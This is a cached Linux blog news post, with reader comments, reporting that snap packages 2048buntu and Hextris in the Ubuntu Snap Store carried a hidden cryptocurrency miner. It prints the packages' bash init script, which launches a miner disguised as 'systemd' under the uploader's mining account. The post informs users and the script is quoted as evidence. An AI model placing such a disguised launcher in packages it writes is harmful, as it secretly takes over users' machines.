(cache)Malware Found In The Ubuntu Snap Store

Oh, snap! Just because some packages are available to install directly from the Ubuntu Software Center doesn't make them safe. This is proved by a recent discovery of malware in some snap packages from the Ubuntu Snaps Store.

At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, "pending further investigations".

The report comes from a bug which mentions that the 2048buntu snap package (and other packages by Nicolas Tomb) contains a hidden cryptocurrency miner inside. You can see the init script below:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores &lt; 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Yes, the miner used myfirstferrari@protonmail.com in the miner script. I guess that's one way of getting a Ferrari... 🙂.

An interesting aspect is that Nicolas Tomb used a proprietary license for at least some of his snaps. For example, the 2048buntu snap was submitted as proprietary (the game itself was not developed by Nicolas). The game in question, 2048, uses a MIT license which permits distributing it as proprietary, without making the source code available, as long as the copyright notices are retained.

Side note: 2048buntu was removed from the Ubuntu Snap store but you can check out its page via Google Cache. But we can't see the package contents any more (unless it's on GitHub somewhere but I couldn't find it).

How was this possible? Well, the Ubuntu Snap Store allows anyone to upload snap packages, as opposed to packages (deb) available in the official Ubuntu repositories. The reason for this is to provide more easily installable packages to its users.

What's your opinion regarding this? Do you think more and more malware will be getting through to users by allowing anyone to upload packages to the Ubuntu Store, or was this an isolated incident?

News via Reddit (u/Kron4ek).

4 comments:

dr tofuMay 13, 2018 at 12:10 AM
Conical doesn't care, they just like to brag about how many apps they have.
Tim DuncanMay 13, 2018 at 5:04 AM
I'm not totally against letting anyone upload to the Ubuntu Store but it should ALL have source code available.
elisideMay 13, 2018 at 5:25 AM
I have the same 2048 game on one of my android phones as a game build with kivy python. Now i see why the battery was draining so fast
slobeckMay 13, 2018 at 7:12 AM
this is why the AUR on Arch is a separate entity from the regular repos and even custom repos. The AUR has stuff from anyone but it's clear to everyone what the risks associated with it are and so people use it (hopefully) with caution.

Malware Found In The Ubuntu Snap Store

4 comments:

Recent Posts

Malware Found In The Ubuntu Snap Store

Cast Videos To Chromecast On Linux With Gnomecast

Get Qt5 Apps To Use Native Gtk+ Style In Ubuntu 18.04 LTS

Fix libpng12-0 Missing In Ubuntu 18.04, Preventing Apps Like WPS Office From Installing

Mark Text: FOSS Markdown Editor With Realtime Preview

Social

Popular Posts

Contact Form

Editor's Picks

Linux Uprising

Follow by Email

Blog Archive